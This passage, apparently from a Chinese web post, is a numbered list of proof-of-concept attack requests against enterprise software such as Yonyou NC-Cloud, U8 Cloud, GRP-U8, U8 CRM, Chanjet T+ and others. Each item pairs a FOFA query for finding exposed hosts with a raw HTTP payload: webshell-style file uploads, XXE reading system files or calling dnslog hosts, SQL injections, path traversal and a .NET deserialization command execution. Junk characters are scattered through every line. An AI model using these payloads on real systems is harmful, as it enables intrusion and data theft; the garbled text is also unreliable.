* ^8 T) E1 ]# X9 aFOFA:app="用友-NC-Cloud"0 C" A5 W1 k8 ]! r( h
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.18 K( n9 c1 m5 T; _2 R* l+ ]
Host: 203.25.218.166:8888
2 N+ M# H S% V3 c1 J6 a+ ~User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info2 K/ h0 q. }& r+ k
Accept-Encoding: gzip, deflate1 I7 I* g r* h2 D% q0 T
Accept: */*& a% V+ n/ I }3 K5 @! _ i' {2 t
Connection: close# F: I i. S( V3 s7 y% d ^3 q. M$ B
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA2 S& O8 H# b4 g' N6 h
Content-Length: 190
# v( y7 Y) H0 p0 S7 dContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0# k7 N" X1 j+ a' D' k- d7 u0 k/ i
1 B$ v" U, P% E0 p+ x' \
--fd28cb44e829ed1c197ec3bc71748df08 x0 L: E' t1 Q; l9 a( n1 Y
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"% t- @. L5 L! I7 r! k" s
7 K" ]2 ]2 r; k<%out.println(1111*1111);%>4 W! [3 g$ W+ k
--fd28cb44e829ed1c197ec3bc71748df0--5 s% U' r3 X0 v! o4 b
/ W( G& m; s5 y& X
8 R$ A. a! p) i% Y7 Q) n: T1 ~36. 用友NC-Cloud soapFormat XXE
7 y O% k) S( O& d9 ZFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"0 c) B0 G) J9 Y+ z" M. h. r
POST /uapws/soapFormat.ajax HTTP/1.16 l- e; M3 D" J# C2 r0 ^, o6 S
Host: 192.168.40.130:89897 K" @2 s- f) e9 Z" Q, w- e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
; l- `- l0 ]. V7 iContent-Length: 263
1 Y/ l/ b4 V4 R- r+ `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: h# Q4 [: F( s' dAccept-Encoding: gzip, deflate. M2 d2 {5 ^! T
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 {' B4 S- S; I2 A- `
Connection: close4 {/ J0 A) s/ b" g( w
Content-Type: application/x-www-form-urlencoded
8 K( e" i( H' C oUpgrade-Insecure-Requests: 13 n( Z" U$ C: w! E0 l( q: i5 B
& g2 C2 r8 u: J" G0 [msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
, _6 G# c$ V! B' s9 F) {* c+ E' |) p; S4 a$ d
9 F, K$ }& p9 E4 ~9 |
37. 用友NC-Cloud IUpdateService XXE# v" x- X0 b( h7 m8 m$ G! j$ }
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
$ _1 H5 n7 w& b- Z& f1 |1 mPOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
2 m. U8 D' p% k4 y: \! FHost: 192.168.40.130:8989& w' H6 Y& e: B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.363 @) } |$ N0 z' J" }! h
Content-Length: 421
a3 h* A$ ^7 W' m7 K& V# LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9/ I2 w& q- j- [( |" I
Accept-Encoding: gzip, deflate+ W5 E4 {- j: F5 b" O1 s* j
Accept-Language: zh-CN,zh;q=0.9
4 o+ u8 Y0 [7 S/ M H7 B9 ~ OConnection: close
! }2 b* e0 P0 L+ R" J }% `7 nContent-Type: text/xml;charset=UTF-8
4 ]- J. u8 k0 A! USOAPAction: urn:getResult
, r4 j- i# V$ A* V1 V4 bUpgrade-Insecure-Requests: 1% R) o1 |# C2 h- V
( n% [% q; F" L
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
; e/ @$ U' T* i7 d<soapenv:Header/>
/ M* V' `, d/ Y. S, \' a) k<soapenv:Body>1 P! Y- s T0 x% b
<iup:getResult>" `7 t3 Z4 A' r: M1 A# C/ y
<!--type: string-->, H/ o, t. J) c2 @
<iup:string><![CDATA[
, _9 a0 k+ ~& F( P7 F+ c<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
8 M7 H) t) u" j1 d<xxx/>]]></iup:string>$ N' ~! I8 E6 ]% e+ [0 {
</iup:getResult>% d% D% m; c2 X! C
</soapenv:Body> _$ w8 }1 d; j ]+ Q
</soapenv:Envelope>% [/ E' i! F' H5 _0 V
$ a8 N; q: G5 x$ D+ E; i8 ^; E5 z, R. K8 u# [0 z' f
8 m) U$ \" W1 y4 ]3 p) o38. 用友U8 Cloud smartweb2.RPC.d XXE6 N4 @# ~, o: h$ g! Q
FOFA:app="用友-U8-Cloud"6 ~/ y, Y+ B! E' K& ~, _$ U
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
/ p. R8 o) n5 |+ v/ v. [Host: 192.168.40.131:8088
/ W4 Y; c) R6 O+ z7 G; P' v0 VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
8 e5 h8 E$ ~* K! bContent-Length: 260+ h7 |% s/ n" ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
: Z! h# [2 U9 ^Accept-Encoding: gzip, deflate' a) | z: Z; i
Accept-Language: zh-CN,zh;q=0.9( I5 |5 S+ }; g, Y
Connection: close
! o8 T: {* ~4 P( a- s% I. vContent-Type: application/x-www-form-urlencoded
$ E t) }; ^5 x$ |7 g
- o8 N6 n6 \% z; B, ~% y, z7 H__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
4 Q% p' S+ E. q. y8 D: {' u7 `5 {, r2 i0 F
8 C X- h& D$ G0 F# K9 i39. 用友U8 Cloud RegisterServlet SQL注入
p) R# e! h. S- QFOFA:title="u8c"
; h4 C; p: x- y9 q. D5 }0 K( T9 X: c$ T4 DPOST /servlet/RegisterServlet HTTP/1.15 O$ J' {# r, I
Host: 192.168.86.128:8089
( ?9 L/ h( G6 U0 I% k1 bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.366 _8 s/ i v, D
Connection: close8 S7 ~; E. z7 {" v% p8 u
Content-Length: 85
) E9 V5 Z+ ^+ x$ ^4 uAccept: */*& g# B- U2 {3 a/ _$ H/ l
Accept-Language: en1 x7 \! }- ` }9 b2 p
Content-Type: application/x-www-form-urlencoded& P3 M/ k, s& \
X-Forwarded-For: 127.0.0.1
4 r/ r. U m w5 m: iAccept-Encoding: gzip: Q& I: j' ^) l% d: M- K) Q2 o
" q4 `- e1 n5 G% H# g, q7 cusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--; u( A! T, Z& F" R F
, j/ m- P0 ]- b" j1 @+ E% X5 b2 t/ P. y' h
40. 用友U8-Cloud XChangeServlet XXE% J" Q8 q, H0 P1 m) ^
FOFA:app="用友-U8-Cloud" A+ v; K* O! ~, Y
POST /service/XChangeServlet HTTP/1.1
4 ~; ^( Z, S8 ~& f5 H+ C: I8 dHost: x.x.x.x
4 c; Z$ Y1 L, s K m) ]/ x `1 f$ f8 IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
9 s4 l) E1 g; X& VContent-Type: text/xml# T9 c& L# s5 `9 @
Connection: close
: U& n% W) L, V8 S V A' n; M
6 J" c3 E9 r. v2 x7 t! F<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
4 U+ J; J8 f' A
# }7 \8 M- [: B. j5 j7 g+ p ~% }5 u( c! R9 ~( k/ G
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入* D9 D( u/ s' M: }% h
FOFA:app="用友-U8-Cloud"
6 \9 X/ X) u" y& Q6 p8 C! PGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
' _) e/ G; q, @6 m1 xHost:8 o3 c, O, ~' e7 h2 R; n6 v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* Q5 F# r+ \9 c8 \
Content-Type: application/json
$ r* h; m1 T0 e# g- {% zAccept-Encoding: gzip/ ]1 c3 S |2 Z+ l/ h" a" k
Connection: close
$ f+ g; B6 \! V" {6 b- P' ^. u* ~% o4 y- c7 W
# j/ u$ f& B! y, T& j& A42. 用友GRP-U8 SmartUpload01 文件上传
+ H+ H4 B: r4 D# {4 q9 f% yFOFA:app="用友-GRP-U8"+ }- R& j( |$ c( h3 q3 S" {, S
POST /u8qx/SmartUpload01.jsp HTTP/1.1' A6 J& s/ k7 Y
Host: x.x.x.x
|8 n$ {3 ~: w( N9 t ]7 nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt5 |: z# [+ K5 U& e ` I/ y0 ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.364 `0 |: l C \4 a+ q+ E0 J
# Q V+ y |# P8 w
PAYLOAD+ |0 a9 S- J2 j1 ?9 m6 V$ R
( j3 U2 }9 L, x% p/ c0 B
7 v7 f) t2 s4 ~2 _ K2 p$ _* Ahttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
7 y* J$ E, w9 W8 I3 T
- P5 _" _8 ?$ x: O43. 用友GRP-U8 userInfoWeb SQL注入致RCE& d! P5 p; p. M! T7 }6 O' R
FOFA:app="用友-GRP-U8"6 u9 V! u, A0 T, r9 C7 U) l# R+ l3 \
POST /services/userInfoWeb HTTP/1.1' ]1 o7 D" b( ?
Host: your-ip
8 }& e9 \8 e2 m' Q8 T/ qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36- Q7 }, v$ G/ E7 }# h/ |: w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- q3 h% d5 ^$ _, i/ W
Accept-Encoding: gzip, deflate. D8 }: @+ s: w
Accept-Language: zh-CN,zh;q=0.9
. S7 Y5 o/ o) l' O5 gConnection: close* f$ _( n/ f# u: R! V0 B5 j0 A) o
SOAPAction: b+ T9 V7 U7 b+ ^2 ^; k1 o- J3 h- A
Content-Type: text/xml;charset=UTF-8. n7 |( F; ]) [
/ C# f: D1 _# m0 ] X
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
8 v- B- T @7 S$ v C1 H <soapenv:Header/> N7 m9 H" \$ e+ l9 A
<soapenv:Body>
0 C! _$ N9 B# _0 p q. g8 T* P <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
! |/ _. j1 ~% {( d <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>2 \0 ]' ]: H4 c
</ser:getUserNameById>
1 C2 F% k i/ d% _- P </soapenv:Body>
$ g: h5 e! w. X7 U3 K- Z: D</soapenv:Envelope>
x3 x/ d1 I) U1 p" ~' S3 [
* M: ~# F) X7 {$ ^; U
7 s* C' z% V: R7 p9 S8 M8 H8 C44. 用友GRP-U8 bx_dj_check.jsp SQL注入' x; K" Q8 Z6 W( D+ H& G
FOFA:app="用友-GRP-U8"2 a5 \" Z7 o# ~ Y
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
4 F0 T8 L. }# _3 gHost: your-ip) }( k1 O$ i5 l; O# y& n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
; Y" i; {) h5 {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 }9 e+ d' |) S
Accept-Encoding: gzip, deflate
" I. N: c3 F7 y: YAccept-Language: zh-CN,zh;q=0.9* \$ d3 s& q/ e% H* T" [0 o. W8 r
Connection: close
5 g2 e, y6 \; L4 [5 t
3 M+ J; \! D: E. F7 J6 D3 ?
+ `$ u# ]2 J- M4 h/ Q# r( p45. 用友GRP-U8 ufgovbank XXE
3 k) P4 @: n2 ^5 |FOFA:app="用友-GRP-U8"3 M c* Q1 k( o2 g9 q2 D) h
POST /ufgovbank HTTP/1.1
" Y k* [) o% ]% _ oHost: 192.168.40.130:222
8 m- Z! ]* X8 O( L5 N2 t1 R1 {* DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
2 [# E0 D$ _1 R1 J# d7 U. D% xConnection: close4 U5 W, i; D% k* t
Content-Length: 161
( `- J& _( n7 R& q6 C3 hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) u6 j0 i8 r4 L4 {" u# Y" ]
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 n" [' _2 a' S+ N8 I6 B5 ZContent-Type: application/x-www-form-urlencoded- O0 I* k9 r' w3 x: G4 p1 [. d
Accept-Encoding: gzip
( o! {/ d1 x, \
' U* a* }- C" P( T6 d$ F/ L: KreqData=<?xml version="1.0"?>
* M: Y5 o- |# Q" f/ m<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest: R* _1 w7 @0 I2 p, x
/ n o: S2 T1 g- L% ~% L# E4 I% R
7 S1 D0 K* ?* Y0 a, F/ T8 u0 w46. 用友GRP-U8 sqcxIndex.jsp SQL注入
% \9 y: L3 h% ]FOFA:app="用友-GRP-U8", V! t3 i7 Y3 P- B/ e
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
) H# ^) q/ C! e, o8 E4 YHost: your-ip
2 H, }2 c' v. ]+ v* {! c2 JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
& q# S4 E( C* \7 H7 O1 nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 `5 j5 `+ Z$ A' x8 x ?% DAccept-Encoding: gzip, deflate# E( ^ i* N! M @" f! B( ~
Accept-Language: zh-CN,zh;q=0.9
0 i, q7 d2 r! `Connection: close
8 `6 }. [: W- Y# p7 \: I" J" s A Q0 ~2 L
) d$ t0 L3 e- g* G0 p* O* \9 {6 v47. 用友GRP A++Cloud 政府财务云 任意文件读取
* t6 V! Q: O: M# |FOFA:body="/pf/portal/login/css/fonts/style.css"
# i- P3 k* l c9 a+ _GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.13 C& D+ R- z% N
Host: x.x.x.x0 ~, a5 h: L7 M+ `4 ]) j. h M u
Cache-Control: max-age=0
( R8 y1 \! j, b6 qUpgrade-Insecure-Requests: 1
- U& m# k7 F) X5 I$ W$ \! v lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.362 ~( `: K* q, \2 w. H3 i8 m" ^4 y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 D( [ z: K8 `" A4 g7 Y U( PAccept-Encoding: gzip, deflate, br; d; h& D& o f# V) O I9 l
Accept-Language: zh-CN,zh;q=0.9
0 z+ X. W7 i9 e" G) Q; r2 \$ e! IIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
0 l& [; E9 r; \, E3 _* G8 ^Connection: close, ]4 U3 I$ `, z! }( o
, d) `9 m6 u$ T* C. _
w, | B. M* h8 H
; U7 x6 {; [: u, B48. 用友U8 CRM swfupload 任意文件上传2 A5 m% T) U# o/ W
FOFA:title="用友U8CRM"8 q n3 }% x Q) e% w6 V/ a
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
+ [6 Y, P2 ?# x% m& `Host: your-ip/ N0 P4 e- e# x" V1 x6 f' r) o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.02 A1 U: H% y# x- O0 B+ ^
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( U0 E4 ]. _7 h" HAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: N, t/ E$ H+ ]; r ?0 {Accept-Encoding: gzip, deflate/ R* c K3 o* F- n$ _7 _6 @4 n7 T
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
) ]4 K7 e4 W" A: f8 f------269520967239406871642430066855
]$ j; h5 Z. p( nContent-Disposition: form-data; name="file"; filename="s.php"
0 f- s! b% y# z; g7 b1231; p. j: s3 ^1 ~' q. n% k. ]5 S! }) F
Content-Type: application/octet-stream1 |! U0 }# q3 j; `: l( i z
------2695209672394068716424300668553 t% O% r" }; h/ s! G) L7 S7 T
Content-Disposition: form-data; name="upload"
( C8 t7 W3 P8 J( ~7 U1 e5 m9 _upload
: j1 _$ k( e9 o; h: O, R; R------269520967239406871642430066855--
\7 p0 Y& B. i+ u6 r5 N; A/ k& B5 b B0 a3 f& ~' ?9 S
9 Z# Q& o6 s5 H( H$ @3 S! p- @
49. 用友U8 CRM系统uploadfile.php接口任意文件上传- J) r2 U8 n0 y# G! s( a
FOFA:body="用友U8CRM"6 }! y% {# p* Y1 p3 E0 M
# M( I0 I$ \7 C! @* J+ F6 Y; [. U
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
& y5 i0 L2 p" X2 }Host: x.x.x.x% t: L1 d( |6 i" [% {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
- w h3 ?9 y9 C- E7 g. I$ W# oContent-Length: 329
/ p5 P L( O1 s* ~+ OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ k3 i' a6 s% B4 y m3 }
Accept-Encoding: gzip, deflate0 |) X3 X9 J/ ?+ n) T
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 R( j: g" a) Q7 v3 bConnection: close" [/ U* z6 w L
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w* g# e* M& }$ w# i4 b$ U
% _$ G3 k* C7 Z) [' H$ ~9 i-----------------------------vvv3wdayqv3yppdxvn3w
! S7 @* g, t' b8 jContent-Disposition: form-data; name="file"; filename="%s.php "
3 N4 @6 t. N! @; e/ J% |Content-Type: application/octet-stream
: t/ J( L. _& u2 f- n
- _; [" T, w4 r, cwersqqmlumloqa8 n% d: t2 w' ^4 ^+ }4 j
-----------------------------vvv3wdayqv3yppdxvn3w7 f6 I$ k$ b$ A& j( I% s1 K5 Y
Content-Disposition: form-data; name="upload"8 `- U+ H; e- ?. c9 L
( q! J: z9 K3 N K& oupload7 E- D, ^) ^7 L! C- }6 P
-----------------------------vvv3wdayqv3yppdxvn3w--
; ^2 e' [0 z7 X a3 Z+ a" |0 U4 i" j
% @2 S8 U0 a! W9 R `3 t& [& q* |# G7 [8 z- f. G. z& ?0 \
http://x.x.x.x/tmpfile/updB3CB.tmp.php
1 V% w- f5 G7 I
/ ] g v3 A$ Z; C50. QDocs Smart School 6.4.1 filterRecords SQL注入
8 J, L* w$ }( D' A9 ]FOFA:body="close closebtnmodal"' d+ \" b8 \/ i; [* _* U U9 e
POST /course/filterRecords/ HTTP/1.1
; H+ L! Q# z4 k, ~9 KHost: x.x.x.x+ T# v& h7 D$ ^6 E ^) [8 W* n8 [
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
+ ~2 x, ^+ S* y7 T/ U% J! a% K/ L [6 ?Connection: close% R+ k" h# ]; j; t3 t& G
Content-Length: 224+ x4 ?3 ~' M! B4 V. f& \6 t8 p
Accept: */*
4 Y; e% F" ]9 \7 zAccept-Language: en
3 W% z0 S6 j# \Content-Type: application/x-www-form-urlencoded
, p3 D' f8 ~5 ~1 yAccept-Encoding: gzip- @7 @0 R' d* m; w2 ~# }) A
, G) D+ m2 @& A& c2 isearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1+ a8 u2 l+ S: L" o& g' R; F2 d% r# h6 [
: j4 D' N0 Q7 X% A. t5 y4 R" S) w/ W: h
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入! J! s% d9 Z5 u5 N
FOFA:app="云时空社会化商业ERP系统"
0 ]% k8 d; e% t2 xGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
7 @0 G* s$ U' `; e3 k8 [Host: your-ip7 _$ K* m$ W+ q+ x( `+ B- k
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36, N: ^2 l# j. n7 _7 W1 j0 R& s6 b: y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.99 K8 B6 C0 T& p1 f! v
Accept-Encoding: gzip, deflate n$ P& S3 b( H" R- r C
Accept-Language: zh-CN,zh;q=0.9& U: t, j3 ^8 M' J; o
Connection: close( l* l2 L% Z- r& n
" g3 n. ^) x/ e |# y# K2 g, U
6 k6 o7 N; s4 U2 B. |: A A52. 泛微E-Office json_common.php sql注入. V6 Y6 ]; l2 {1 A9 _2 g
FOFA:app="泛微-EOffice"
3 r, [1 `. o' ZPOST /building/json_common.php HTTP/1.1+ C' D* X2 N& c7 l1 a9 c
Host: 192.168.86.128:8097
, E+ h, c8 p% P3 t& @. u+ uUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36% H4 t5 C0 q% a: Q
Connection: close
9 w9 A% [2 D/ g3 BContent-Length: 87
9 Z4 ~8 H; b0 c. j% d' vAccept: */*0 ~7 ]2 T( U% v0 Q
Accept-Language: en
* i1 {9 C* P0 V" T7 x* |Content-Type: application/x-www-form-urlencoded
% o7 p" ~4 M( _# Y& V7 nAccept-Encoding: gzip" ~% F- w0 L4 e7 {( o
4 ]. S) z6 m2 i: s6 b+ Etfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333' j; D. T5 T; ]3 A* k
: ^6 C6 c2 v; U% y+ T( G5 W3 n
( l" [$ s+ ~- W. Q6 N
53. 迪普 DPTech VPN Service 任意文件上传. z& Q% z3 `: d0 S A
FOFA:app="DPtech-SSLVPN"5 X8 F6 y3 s9 j9 _
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd5 J/ `$ }, \ b$ U. M% }( `' y
: f Z" w$ z l& q: q, \ q5 e9 H# G- w4 e# o% Q' v/ Y1 ^2 W2 _
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
) |6 W9 j, n$ a/ O; dFOFA:app="畅捷通-TPlus"+ ^% W+ [# O }! P
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
/ `3 W) s' y7 `"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"0 ]; P& d; [8 y% U" S& y7 e
- m- q3 Y6 M9 |& U1 U6 A* D& Q0 L/ r$ g3 M5 V ?/ g8 F7 H
完整数据包4 t; a% S5 B7 z9 m4 G$ Y
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
: {+ B) J; W/ M/ T, IHost: x.x.x.x
! P2 p; ?) k2 P" XUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
J* h' ?% z7 c% L3 IContent-Length: 5937 V( q& I+ \; S9 } d; A/ v
3 c. @% g' y8 d$ B J% T{$ _% w+ o; A# Z" G. J! @
"storeID":{' w: C6 ^/ S M/ s# A4 l: U& U
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",6 n/ b( C/ \3 A7 r) U
"MethodName":"Start",4 [' c1 }2 C2 h2 m& ]0 ?& h# p
"ObjectInstance":{* _+ y; H; X4 f' P+ c5 P* ?8 \
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
9 x+ m I0 D; `3 b% p2 ?# z0 U "StartInfo":{4 e0 u5 q4 b: y% B
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",1 v) R( ?+ m8 A; r6 x; r
"FileName":"cmd",' x4 V% o* ], b0 Q v
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"7 ], k$ x3 E2 d1 Q# M
}
1 {" {7 s1 f/ ?. k }2 r1 o' C# ^+ i" [( w* M5 f: ^
}
3 M9 B$ ?) \6 W! u}( T- B! a0 C1 T
4 Y- S- R0 \* ^+ z% h) C
6 v* b. E- F: x1 l第二步,访问如下url! D8 K; |, S% D+ J
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
0 a" D9 d* }8 P6 w" A t! ]8 m- c W2 d
9 C \- n, @* B55. 畅捷通T+ getdecallusers信息泄露
D8 S7 g- L3 Q DFOFA:app="畅捷通-TPlus"
/ g) X8 ^. H+ E- ~* ~$ V第一步,通过- ~) w2 P8 a5 ^( s
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie& K7 R1 e$ [: q; Q/ G
第二步,利用获取到的Cookie请求
4 X5 D$ s! ?. a, N/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers6 {' X3 O5 J! _1 ~2 [
! n5 \6 G. ~* C% O3 x
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE2 G4 }; ~; ^. P- w) Z' j$ ~8 a
FOFA: app="畅捷通-TPlus"8 x" j, O& G, r
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
7 J9 c* ^) b+ THost: x.x.x.x
